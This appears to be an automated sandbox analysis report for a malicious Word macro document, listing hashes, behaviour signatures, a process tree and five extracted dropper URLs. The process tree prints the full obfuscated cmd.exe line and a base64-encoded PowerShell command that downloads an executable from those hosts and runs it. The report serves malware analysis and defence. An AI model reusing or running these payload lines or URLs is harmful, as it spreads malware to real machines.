Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-06-2024 15:45

General

  • Target

    8e9915043975b67b01971a4ad74fe789_JaffaCakes118.doc

  • Size

    78KB

  • MD5

    8e9915043975b67b01971a4ad74fe789

  • SHA1

    fb0e04b39f2ee5400e89c08f0ce8cb2bf66d97a5

  • SHA256

    07afeb101eab97daac3863600d40b1851bd710d4481dbe0a93459fd07624e468

  • SHA512

    85813d5d38ac484c5d915c1352d4ea015ee2df145bd028323a53c62d6f1995720e86fe3957230c734a71b84d345ea47c9dc1e68520d319d0f8a80c790988a844

  • SSDEEP

    1536:VptJlmrJpmxlRw99NBE+aGW3CDp1n+xYpKY:rte2dw99fk3mbn+2pZ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://alpharockgroup.com/HT

exe.dropper

http://adminflex.dk/l5TF6w

exe.dropper

http://gailong.net/X5AyWfJG

exe.dropper

http://shunji.org/logsite/TJaaB

exe.dropper

http://binar48.ru/OtTlVIU5

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8e9915043975b67b01971a4ad74fe789_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1576
    • C:\Windows\SYSTEM32\Cmd.exe
      Cmd /V^:^oN /r "^Se^T ^ ^ ^J^e^4=^A^AC^AgA^AI^A^AC^A^gAA^IA^ACA^g^AA^IAACA^g^AA^I^A^ACA^gA^A^I^A^AC^A^gAQ^fA0^H^A^7BA^aA^M^GA0BQ^YA^M^G^A9^BwOAs^GAhBQZAI^HAiB^w^OAs^EA^u^B^wdA^QC^A^gA^Q^b^AU^G^A^0^B^Q^S^A0C^AlBwa^A8G^A2Bg^bAk^EA^7^A^Q^K^A^sEA^u^B^wdA^QCAgAA^LA^sE^AL^B^g^S^A^QCAo^AQZA^wGApBgRA^QGA^hBwbA^w^G^AuB^w^d^A^8^G^A^E^B^gLA^E^FA^UBgeAQC^A7B^Q^e^A^I^HA0^B^w^e^A^kC^Ar^BgeAg^F^Ak^A^A^IA4GA^pB^A^IA^sEALB^g^SA^QCAoA^AaAMG^A^hBQZAI^HAvBg^Z^A^s^DAnAQZAg^H^Al^Bg^LAcCArAge^AcFAZ^B^AJAsCAn^AAXAcCAr^A^w^Y^A^kGAsB^gYA^U^HA^wB^gOAYH^Au^B^Q^ZAQC^A9Aw^S^A^4^GA3^B^AJ^A^s^DAnA^gM^Ak^DA^2A^wJ^AACA9A^A^IA^oHA^X^B^QW^AQCA7AQKAcC^A^ABwJ^A^gC^A0BQa^A^wG^A^wB^w^UA4CAn^A^QN^AU^F^AJBgV^A^wG^AUB^AdA8^EAv^A^Q^dA^IHA^u^A^AO^A^Q^D^A^yBQY^A4^G^A^p^BgYA^8C^Av^Ag^OA^AH^A^0B^A^d^A^gG^A^A^B^gQ^A^EG^AhBg^SA^QFAv^A^QZ^AQH^ApB^wc^Ac^G^AvB^AbA^8C^An^B^gcA8GA^uA^QaA^oG^AuB^QdA^gGA^zB^wLA8CA^6^A^AcA^Q^H^A0^B^Aa^AA^EA^H^B^g^SAYGA^X^BQe^AE^EA^1^A^AWA8CA0^B^QZ^A^4GA^uAw^Z^A^4^GAvB^A^b^Ak^GA^h^B^wZ^A8CAvA^gO^AA^H^A^0^BAd^Ag^GAAB^w^dAYD^AG^B^AVA^UD^A^s^BwL^A^s^G^AkBgLA^g^HAl^BAb^AYG^A^u^BQ^a^A0GAk^BQ^YA^8C^Av^AgO^A^AH^A^0B^AdA^g^G^A^ABAV^Ag^E^AvA^QbA8G^AjBg^LA^A^HA^1BwbA^IHAnBwaAMGAvB^gc^A^EGAo^BAcAw^GAh^BwLA8C^A6^A^Ac^A^QH^A^0B^A^a^AcC^A^9^Awa^A^oH^A^Y^B^A^JA^s^DA^0B^gbA^U^G^Ap^BA^bA^M^E^A^iB^Q^Z^AcFA^uA^AdA^UG^A^O^BA^IA^Q^HAjB^Q^Z^Ao^G^A^iB^wb^A^0CA^3B^QZA^4GA^9AQ^UA^QF^A6B^A^J^ ^e^-^ ^l^l^e^hsr^e^wo^p& ^foR /^L %^B ^IN ( ^ 9^25^ ^ ^-^1 ^ ^0) D^O s^E^t ^OQR^J=!^OQR^J!!^J^e^4:~ %^B, 1!&& I^f %^B ^LEQ ^0 Ca^L^l %^OQR^J:^*OQRJ^!^=% "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4060
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e JAB6AFQAUQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABYAHoAawA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAcABoAGEAcgBvAGMAawBnAHIAbwB1AHAALgBjAG8AbQAvAEgAVABAAGgAdAB0AHAAOgAvAC8AYQBkAG0AaQBuAGYAbABlAHgALgBkAGsALwBsADUAVABGADYAdwBAAGgAdAB0AHAAOgAvAC8AZwBhAGkAbABvAG4AZwAuAG4AZQB0AC8AWAA1AEEAeQBXAGYASgBHAEAAaAB0AHQAcAA6AC8ALwBzAGgAdQBuAGoAaQAuAG8AcgBnAC8AbABvAGcAcwBpAHQAZQAvAFQASgBhAGEAQgBAAGgAdAB0AHAAOgAvAC8AYgBpAG4AYQByADQAOAAuAHIAdQAvAE8AdABUAGwAVgBJAFUANQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAWQBXAHoAIAA9ACAAJwA2ADkAMgAnADsAJAB3AG4ASwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABZAFcAegArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQASgBLAEsAIABpAG4AIAAkAFgAegBrACkAewB0AHIAeQB7ACQAegBUAFEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQASgBLAEsALAAgACQAdwBuAEsAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAdwBuAEsAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3204

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD9645.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j3jydd3t.qfs.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Public\692.exe

    Filesize

    1KB

    MD5

    9b39abbc2e5ec870d77a6b2cf5d3d308

    SHA1

    2b5c54fa12472a1887e89ae920cb269ac146ad0d

    SHA256

    6e10528977b130b1e4e5b63c8fb2f47f3047f8a786d38fe14bc144026d920d51

    SHA512

    c4cd51c3dd7e3f0fbb58db564c7f96845e1639794a49446db550876ac31153ae6b46dd663400984a3301fc801d35882e79c400a18b2c5c1ed6aaf2deb0ae4e4d

  • memory/1576-27-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-6-0x00007FF93C790000-0x00007FF93C7A0000-memory.dmp

    Filesize

    64KB

  • memory/1576-5-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-29-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-7-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-3-0x00007FF97C7AD000-0x00007FF97C7AE000-memory.dmp

    Filesize

    4KB

  • memory/1576-9-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-11-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-10-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-12-0x00007FF93A6D0000-0x00007FF93A6E0000-memory.dmp

    Filesize

    64KB

  • memory/1576-13-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-15-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-14-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-16-0x00007FF93A6D0000-0x00007FF93A6E0000-memory.dmp

    Filesize

    64KB

  • memory/1576-17-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-1-0x00007FF93C790000-0x00007FF93C7A0000-memory.dmp

    Filesize

    64KB

  • memory/1576-568-0x00007FF93C790000-0x00007FF93C7A0000-memory.dmp

    Filesize

    64KB

  • memory/1576-4-0x00007FF93C790000-0x00007FF93C7A0000-memory.dmp

    Filesize

    64KB

  • memory/1576-8-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-572-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-0-0x00007FF93C790000-0x00007FF93C7A0000-memory.dmp

    Filesize

    64KB

  • memory/1576-2-0x00007FF93C790000-0x00007FF93C7A0000-memory.dmp

    Filesize

    64KB

  • memory/1576-469-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-542-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-543-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-544-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-545-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-546-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-547-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-548-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/1576-569-0x00007FF93C790000-0x00007FF93C7A0000-memory.dmp

    Filesize

    64KB

  • memory/1576-571-0x00007FF93C790000-0x00007FF93C7A0000-memory.dmp

    Filesize

    64KB

  • memory/1576-570-0x00007FF93C790000-0x00007FF93C7A0000-memory.dmp

    Filesize

    64KB

  • memory/1576-28-0x00007FF97C710000-0x00007FF97C905000-memory.dmp

    Filesize

    2.0MB

  • memory/3204-45-0x000001DFDA650000-0x000001DFDA672000-memory.dmp

    Filesize

    136KB